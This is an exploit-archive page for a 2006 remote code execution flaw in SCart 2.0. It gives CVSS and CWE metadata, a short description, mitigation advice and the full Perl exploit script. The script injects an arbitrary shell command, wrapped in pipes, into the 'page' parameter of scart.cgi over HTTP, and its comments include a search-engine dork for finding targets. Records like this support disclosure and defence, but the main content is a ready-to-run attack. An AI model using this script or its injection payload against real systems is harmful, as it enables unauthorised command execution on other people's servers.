header-logo
Suggest Exploit
vendor:
SCart Server
by:
K-159
9.3
CVSS
HIGH
Remote Code Execution
78 (Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CWE
Product Name: SCart Server
Affected Version From: 2
Affected Version To: 2
Patch Exists: Yes
Related CWE: N/A
CPE: a:scartserver:scart_server:2.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

SCart 2.0 Remote Code Execution Exploit

This exploit allows an attacker to execute arbitrary code on a vulnerable SCart 2.0 server. The vulnerability is due to an input validation error in the 'scart.cgi' script, which allows an attacker to inject arbitrary commands into the 'page' parameter. This exploit was discovered and published by K-159 in 2006.

Mitigation:

Upgrade to the latest version of SCart 2.0, or apply the patch provided by the vendor.
Source

Exploit-DB raw data:

#!/usr/bin/perl
##
#     SCart 2.0 Remote Code Execution Exploit
#          Bugs Found & code By K-159
#               
## base on advisory at http://advisories.echo.or.id/adv/adv32-K-159-2006.txt
#   
#  echo.or.id (c) 2006
#
##
# usage:
# perl scart.pl <target> </path/> "cmd"
#
# Google Dork : site: scartserver.com
#
# Greetz: my soul mate,echo|staff,aikmel|crew,masterpop3,SinChan,rizal,etc
#
# Contact: eufrato[at]gmail.com www.echo.or.id #e-c-h-o @irc.dal.net
#
use IO::Socket;
use LWP::Simple;

sub Usage {
print STDERR "\n ========================================================= \r\n";
print STDERR "      *SCart 2.0 Remote Code Execution Exploit* \r\n";
print STDERR "                Bugs Found by K-159 \r\n";
print STDERR "         www.echo.or.id #e-c-h-o irc.dal.net \r\n";
print STDERR "        Usage: $0 <www.target.com> </path/> \"cmd\" \r\n";
print STDERR "============================================================= \r\n";
exit;
}

if (@ARGV < 3)
{
 Usage();
}


$host = @ARGV[0];
$path = @ARGV[1];
$command = @ARGV[2];

print "\n[+] Conecting to $host\n";

my $result = get("http://$host$path/scart.cgi?action=show_page&base= base2.html&page=browse.txt|$command|");

if (defined $result) {
print $result;
}
else {
print "Exploit Failed.\n";
} 

# milw0rm.com [2006-06-04]

Navigation

Suggest Exploit

Services By CQR